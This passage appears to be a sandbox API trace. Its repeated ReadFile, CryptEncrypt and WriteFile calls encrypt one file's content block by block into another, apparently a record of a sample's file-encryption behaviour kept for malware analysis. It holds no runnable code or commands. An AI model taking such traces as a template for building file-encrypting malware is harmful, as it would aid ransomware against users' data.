lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.093] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.093] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.093] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.094] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.094] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.094] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.095] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.095] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.095] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.108] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.108] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.109] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.109] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.109] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.110] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.110] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.110] 